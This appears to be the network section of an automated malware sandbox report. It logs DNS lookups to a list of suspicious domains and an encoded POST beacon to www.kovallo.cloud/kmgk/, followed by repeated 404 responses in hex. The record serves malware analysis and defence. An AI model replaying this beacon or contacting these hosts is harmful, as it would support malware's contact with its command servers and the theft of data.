            Source: global trafficDNS traffic detected: DNS query: www.galaxyslot88rtp.lat
            Source: global trafficDNS traffic detected: DNS query: www.warriorsyndrome.net
            Source: global trafficDNS traffic detected: DNS query: www.ks1x7i.vip
            Source: global trafficDNS traffic detected: DNS query: www.pakmartcentral.shop
            Source: global trafficDNS traffic detected: DNS query: www.les-massage.online
            Source: global trafficDNS traffic detected: DNS query: www.rtpngk.xyz
            Source: global trafficDNS traffic detected: DNS query: www.wcq24.top
            Source: global trafficDNS traffic detected: DNS query: www.cc101.pro
            Source: global trafficDNS traffic detected: DNS query: www.asociacia.online
            Source: global trafficDNS traffic detected: DNS query: www.deefbank.net
            Source: unknownHTTP traffic detected: POST /kmgk/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 211Cache-Control: no-cacheHost: www.kovallo.cloudOrigin: http://www.kovallo.cloudReferer: http://www.kovallo.cloud/kmgk/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 39 65 34 37 6a 47 43 55 6f 31 68 65 35 7a 33 65 47 6f 30 79 6a 56 42 77 38 63 64 74 33 71 4c 7a 62 2f 63 7a 66 6e 72 38 70 44 7a 73 70 67 61 57 5a 51 4d 45 30 4d 77 71 68 62 30 4d 45 6a 64 66 43 41 30 5a 6c 33 70 47 65 6a 6f 50 43 5a 48 79 5a 56 4e 33 47 64 67 7a 34 57 73 4d 43 72 65 6e 2b 35 43 76 42 58 31 75 6f 68 52 56 5a 76 4b 70 4a 50 2f 49 2f 52 6a 55 74 72 76 79 70 78 4e 4b 79 46 69 7a 41 4f 52 62 69 39 64 63 6f 58 68 4b 63 6a 61 49 42 45 6f 34 53 50 70 4f 44 4b 58 68 45 6e 68 4d 78 35 74 68 43 61 63 51 37 6e 2f 73 6a 44 55 30 2b 31 54 73 71 5a 51 73 35 71 6f 55 Data Ascii: i4fTbV=dsMqkxxmQj+V9e47jGCUo1he5z3eGo0yjVBw8cdt3qLzb/czfnr8pDzspgaWZQME0Mwqhb0MEjdfCA0Zl3pGejoPCZHyZVN3Gdgz4WsMCren+5CvBX1uohRVZvKpJP/I/RjUtrvypxNKyFizAORbi9dcoXhKcjaIBEo4SPpODKXhEnhMx5thCacQ7n/sjDU0+1TsqZQs5qoU
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:41:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:41:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:41:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:41:28 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 22 Sep 2024 15:41:41 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-22T15:41:46.7226135Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:42:01 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:42:03 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:42:06 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:42:08 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 22 Sep 2024 15:42:31 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 